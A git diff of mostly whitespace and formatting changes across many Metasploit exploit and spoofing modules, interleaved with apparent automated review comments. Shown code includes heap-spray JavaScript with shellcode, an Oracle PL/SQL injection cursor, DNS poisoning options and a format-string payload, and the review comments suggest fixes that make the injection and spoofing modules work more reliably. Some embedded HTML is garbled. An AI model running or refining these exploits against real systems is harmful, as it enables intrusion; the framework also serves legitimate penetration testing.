ab2a8ce137..17a467759f 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Proxy' ] + [ 'Proxy' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index c1c12a1f59..64e08fc1a6 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary payload << dtp_neighbor_section n.l3.payload = payload - n.iface = datastore['IFACE'] + n.iface = datastore['IFACE'] n.pack() while @run n.send2() diff --git a/modules/auxiliary/spoof/cisco/pvstp.rb b/modules/auxiliary/spoof/cisco/pvstp.rb index 5cfb8df3a8..0429b0fdab 100644 --- a/modules/auxiliary/spoof/cisco/pvstp.rb +++ b/modules/auxiliary/spoof/cisco/pvstp.rb 
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/cisco/stp.rb b/modules/auxiliary/spoof/cisco/stp.rb index 3a4d8ae0fd..c8d6f4d378 100644 --- a/modules/auxiliary/spoof/cisco/stp.rb +++ b/modules/auxiliary/spoof/cisco/stp.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index a0a3983f32..4e09ac20a1 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -33,11 +33,10 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - ' I)ruid', 'hdm', - # - 'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method - # and was cool enough to email us and share! - # + 'I)ruid', 'hdm', + # Cedric figured out the NS injection method + # and was cool enough to email us and share! + 'Cedric Blancher <sid[at]rstack.org>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 
@@ -49,27 +48,27 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], ], 'DisclosureDate' => 'Jul 21 2008' - )) + )) - register_options( - [ - OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), - OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), - OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), - OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), - OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), - OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), - OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), - ], self.class) + register_options( + [ + OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), + OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), + OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), + OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), + OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), + OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), + OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), + ], self.class) - deregister_options('FILTER','PCAPFILE') + deregister_options('FILTER','PCAPFILE') end def auxiliary_commands return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server" - } + } end def cmd_racer(*args) 
diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 249427e96f..4c4f0de5ba 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server", - } + } end def cmd_racer(*args) diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index d19e812b9a..c178a48f14 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Airpwn' ] + [ 'Airpwn' ] ], 'PassiveActions' => [ @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary rescue EOFError rescue ::Exception => e print_error("AIRPWN: failed to parse response file " \ - "#{r['file']}, #{e.class} #{e} #{e.backtrace}") + "#{r['file']}, #{e.class} #{e} #{e.backtrace}") end end else diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 261f392e46..cec57104b3 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb 
@@ -49,14 +49,15 @@ class Metasploit3 < Msf::Auxiliary p = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - cursor = " - DECLARE - #{p} NUMBER; - BEGIN - #{p} := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); - SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); - END;" + cursor = <<-EOF +DECLARE +#{p} NUMBER; +BEGIN +#{p} := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); +SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); +END; +EOF begin print_status("Sending Evil Cursor and SQLI...") diff --git a/modules/auxiliary/test/capture.rb b/modules/auxiliary/test/capture.rb index 395d03ec4b..42fa358f3d 100644 --- a/modules/auxiliary/test/capture.rb +++ b/modules/auxiliary/test/capture.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Sniffer' ] + [ 'Sniffer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/test/eth_spoof.rb b/modules/auxiliary/test/eth_spoof.rb index b954636220..4e60f7d1b8 100644 --- a/modules/auxiliary/test/eth_spoof.rb +++ b/modules/auxiliary/test/eth_spoof.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Spoofer' ] + [ 'Spoofer' ] ], 'DefaultAction' => 'Spoofer' ) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index e658fed70b..f3aaa7b39d 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb 
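Review bot: `datastore['SQL']` is interpolated straight into the nested PL/SQL literal on the DBMS_SQL.PARSE line, where it sits two quote levels deep (`execute immediate ''…''` inside a `'…'` string), so any statement containing a `'` terminates the literal and the cursor fails to parse. Doubling the quotes twice keeps the nesting intact: `sql = datastore['SQL'].gsub("'", "''''")` and then `execute immediate ''#{sql.upcase}''`. The `.upcase` also uppercases any string literal inside the operator's statement (a password, a filename); if the target does not require it, drop it. The `<<-EOF` form appends a newline after `END;` that the old string did not have, which the PL/SQL parser should tolerate but is worth confirming. The enclosing method starts and ends outside the hunk.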
@@ -41,23 +41,26 @@ class Metasploit3 < Msf::Auxiliary begin - name=datastore['MSG'] - src=datastore['SRCADDR'] - connect_udp + name = datastore['MSG'] + src = datastore['SRCADDR'] + connect_udp - print_status("Sending Fake SIP Invite to: #{ip}") - req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" - req << "To: <sip:#{ip}>" + "\r\n" - req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" - req << "From: \"#{name}\"<sip:#{src}>" + "\r\n" - req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" - req << "CSeq: 1 INVITE" + "\r\n" - req << "Max-Forwards: 20" + "\r\n" - req << "Contact: <sip:127.0.0.1>" + "\r\n\r\n" - udp_sock.put(req) - disconnect_udp + print_status("Sending Fake SIP Invite to: #{ip}") + + req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" + req << "To: <sip:#{ip}>" + "\r\n" + req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" + req << "From: \"#{name}\"<sip:#{src}>" + "\r\n" + req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" + req << "CSeq: 1 INVITE" + "\r\n" + req << "Max-Forwards: 20" + "\r\n" + req << "Contact: <sip:127.0.0.1>" + "\r\n\r\n" + + udp_sock.put(req) + disconnect_udp rescue Errno::EACCES end + end end \ No newline at end of file diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 2424212c51..c9be1cb2da 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -38,12 +38,11 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback register_options( [ - OptString.new('STAT_KEY', - [ true, + OptString.new('STAT_KEY', [ true, "STAT key from target host (see tools/context/stat-key utility)", - "0x00000000"]), - OptString.new('STAT_FILE', [ true, "name of file to stat(2)", "/bin/ls"]), - ], self.class) + "0x00000000" ]), + OptString.new('STAT_FILE', [ true, "name of file to stat(2)", "/bin/ls" ]), + ], self.class) end def obtain_key(buf, badchars, state) 
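Review bot: `rescue Errno::EACCES` at the end of the hunk still swallows the error with no output, so an operator who cannot bind or send the spoofed INVITE gets no indication why; report it with `rescue Errno::EACCES => e` / `print_error("#{ip} - #{e}")`. `disconnect_udp` is only reached on the happy path, so any other exception from `udp_sock.put` leaves the socket open; it belongs in an `ensure` (guarded with `if udp_sock` if the mixin leaves it nil when connect_udp fails — not visible here). The file is also still written without a trailing newline (`\ No newline at end of file`), which this whitespace cleanup could have fixed. run_host's signature is outside the hunk.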
diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 01ac0d0171..7f4b9d2ece 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-2221'], + [ 'CVE', '2004-2221'], [ 'OSVDB', '9011'], [ 'BID', '10926'], ], diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 3a862516be..495ed21dcf 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-0608'], + [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index c7446421ea..6cfcb6e695 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -92,8 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote # print_status("Malicious request sent, do_ej should be overwritten") req = c.request_cgi({ 'uri' => "/apply.cgi", - 'method' => 'POST', - 'data' => post_data }) + 'method' => 'POST', + 'data' => post_data + }) c.send_request(req) print_status("Mayhem sent") diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 1db02189e2..a5596834a5 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-1148'], - ['OSVDB', '23777'], + ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], 
diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index 56a3ed1ed6..03cf4f1187 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -141,8 +141,9 @@ class Metasploit3 < Msf::Exploit::Remote len = datastore['LENGTH'].to_i seq = [rand(255)].pack('n') jmpesp = target['JMPESP'] # jmp esp in vdso - scan_iterate_ra=target['scan_iterate_ra'] # address just after the call - # in ieee80211_scan_iterate in wlan.ko + + # address just after the call (in ieee80211_scan_iterate in wlan.ko) + scan_iterate_ra=target['scan_iterate_ra'] if scan_iterate_ra howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 6e01b21733..d2d4342e7b 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -107,8 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote var_data_str1 = Rex::Text.rand_text_alpha(3) var_data_str2 = Rex::Text.rand_text_alpha(4) - js = %Q^ - + js = <<-EOF var xunescape = unescape; var shellcode = xunescape("#{enc_code}"); @@ -117,7 +116,7 @@ oneblock = xunescape("#{enc_ret}"); var fullblock = oneblock; while (fullblock.length < #{target['BlockLen']}) { - fullblock += fullblock; + fullblock += fullblock; } var sprayContainer = new Array(); 
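Review bot: The relocated assignment `scan_iterate_ra=target['scan_iterate_ra']` keeps the unspaced `=`, which now stands out against `jmpesp = target['JMPESP']` directly above it in the same hunk; write it as `scan_iterate_ra = target['scan_iterate_ra']` while moving it. The enclosing method starts and ends outside the hunk.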
@@ -144,56 +143,56 @@ var searchArray = new Array(); function escapeData(data) { - var xi; - var xc; - var escData=''; - for(xi=0; xi<data.length; xi++) - { - xc=data.charAt(xi); - if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); - escData+=xc; - } - return escData; + var xi; + var xc; + var escData=''; + for(xi=0; xi<data.length; xi++) + { + xc=data.charAt(xi); + if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); + escData+=xc; + } + return escData; } function DataTranslator() { - searchArray = new Array(); - searchArray[0] = new Array(); - searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}"; - var newElement = document.getElementById("content"); - if (document.getElementsByTagName) { - var xi=0; - pTags = newElement.getElementsByTagName("p"); - if (pTags.length > 0) - while (xi < pTags.length) - { - oTags = pTags[xi].getElementsByTagName("font"); - searchArray[xi+1] = new Array(); - if (oTags[0]) { - searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML; - } - xi++; - } - } + searchArray = new Array(); + searchArray[0] = new Array(); + searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}"; + var newElement = document.getElementById("content"); + if (document.getElementsByTagName) { + var xi=0; + pTags = newElement.getElementsByTagName("p"); + if (pTags.length > 0) + while (xi < pTags.length) + { + oTags = pTags[xi].getElementsByTagName("font"); + searchArray[xi+1] = new Array(); + if (oTags[0]) { + searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML; + } + xi++; + } + } } function GenerateHTML() { - var xhtml = ""; - for (xi=1;xi<searchArray.length;xi++) - { - xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]); - } + var xhtml = ""; + for (xi=1;xi<searchArray.length;xi++) + { + xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]); + } } setInterval("fill_function()", .5); -^ +EOF # Obfuscate it up a bit js = obfuscate_js(js, 'Symbols' => { 'Variables' => %W{ DataTranslator GenerateHTML 
escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } - }).to_s + }).to_s str1 = Rex::Text.rand_text_alpha(20) str2 = Rex::Text.rand_text_alpha(24) diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index e7cb5feb03..1589d86e1e 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -78,43 +78,43 @@ class Metasploit3 < Msf::Exploit::Remote enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) - return %Q| + return <<-EOF <html> <head> - <title>One second please... - +function FillHeap() { + // Filler + var m = ""; + var h = ""; + var a = 0; + + // Nop sled + for(a=0; a<(1024*256); a++) + m += unescape("#{enc_nops}"); + + // Payload + m += unescape("#{enc_code}"); + + // Repeat + for(a=0; a<1024; a++) + h += m; + + // Return + return h; +} + - | +EOF end end diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 3c63ff386e..3d6d5700a1 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_X86, 'Addr' => 'ATe' }, - ] + ] ], 'DisclosureDate' => 'Jun 01 2009', 'DefaultTarget' => 0)) @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote # Return back an example URL. Using an iframe doesn't work with all # browsers, but that's easy enough to fix if you need to. return String(<<-EOS) - iTunes loading . . . - - -

iTunes should open automatically, but if it doesn't, click to - continue.

- - - EOS +iTunes loading . . . + + +

iTunes should open automatically, but if it doesn't, click to +continue.

a + + +EOS end def on_request_uri(cli, request) diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 7776108f31..fe3afff5da 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2009-3867' ], [ 'OSVDB', '59711' ], - [ 'BID', '36881' ], + [ 'BID', '36881' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ] ], 'Payload' => @@ -175,18 +175,20 @@ No automatic targetting for now ... def generate_html(pl) - html = %Q| - - - - - - - - - + html = <<-EOF + + + + + + + + + + -| +EOF + # finalize the html jar_name = rand_text_alphanumeric(32) html.gsub!(/JARNAME/, jar_name) diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index add9609552..51630e99f5 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2009-3869' ], [ 'OSVDB', '59710' ], - [ 'BID', '36881' ], + [ 'BID', '36881' ], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ], ], @@ -164,18 +164,19 @@ No automatic targetting for now ... def generate_html(pl) - html = %Q| - - - - - - - - - + html = <<-EOF + + + + + + + + + + -| +EOF # finalize html jar_name = rand_text_alphanumeric(32)+".jar" html.gsub!(/JARNAME/, jar_name) diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 4da03413b8..53b4097026 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb 
@@ -135,10 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote def get_code - appletsource = %Q^ -/* - */ - + appletsource = <<-EOF import java.applet.Applet; import java.io.ByteArrayInputStream; import java.io.ObjectInputStream; @@ -338,9 +335,12 @@ public class #{datastore['APPLETNAME']} extends Applet catch( Exception e ) { System.out.println("Payload instantiation error: " + e); } } } -}^ - appletcode = { 'classnames' => [ datastore['APPLETNAME'] ] , - 'codefiles' => [ appletsource ] } +} +EOF + appletcode = { + 'classnames' => [ datastore['APPLETNAME'] ], + 'codefiles' => [ appletsource ] + } return appletcode end @@ -401,12 +401,15 @@ public class #{datastore['APPLETNAME']} extends Applet @signedjar = "#{datastore['APPLETNAME']}.jar" build_jar( unsignedjar, - [ # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) + [ + # Applet + datastore['APPLETNAME'] + ".class", + # PayloadX class + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", + # PayloadX StreamConnector for pure Java payload + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" + ] + ) print_status "Jar built. Signing..." diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index d6357c3b44..ed5819f5c3 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2005-2265'], ['OSVDB', '17968'], - ['BID', '14242'], + ['BID', '14242'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'], ], 'Payload' => @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote One second please... -
-
+
+
EOF diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 9dfae070ed..d63762c68f 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -145,7 +145,7 @@ for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter #{j_format} = unescape("#{write}"); #{j_format} += '%#{ret}x'; for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++) - #{j_format} += '%x'; + #{j_format} += '%x'; #{j_format} += '%hn'; #{axobj}.#{method} = #{j_format}; diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index bdbefc9df2..3ce4e5171c 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 03 2008' diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index 996fab374d..32aa8d684a 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -92,38 +92,36 @@ class Metasploit3 < Msf::Exploit::Remote # Build out the message - content = %Q| - - - - - - | - - + content = <<-EOF + + + + + +EOF print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index a1e92f56e7..0c19e8ac13 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb 
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], # Patched [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index e9975cf556..e0fd432409 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 3f38b7f3ab..8b3bdabe50 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2007')) diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index a4a863d6d3..40a184d974 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2006-6707'], + [ 'CVE', '2006-6707'], [ 'OSVDB', '32399'], [ 'URL', 'http://secunia.com/advisories/23463' ], ], diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 53b3bcac6c..3a41d0d03a 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb 
+++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2005-4560'], - ['OSVDB', '21987'], + ['OSVDB', '21987'], ['MSB', 'MS06-001'], - ['BID', '16074'], + ['BID', '16074'], ['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'], ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index f7e2cab46f..d5f90aa43e 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2006-1359'], ['OSVDB', '24050'], - ['MSB', 'MS06-013'], + ['MSB', 'MS06-013'], ['BID', '17196'], ['US-CERT-VU', '876678'], ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index f8dd90f75d..a3bc4fa2ad 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 07 2008')) diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 3abddc89a9..cbc7ef6ab2 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb 
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary - code. + code. }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 00fe0ce8f9..a3d8fe5d22 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X > - ]]> + ]]> @@ -245,7 +245,7 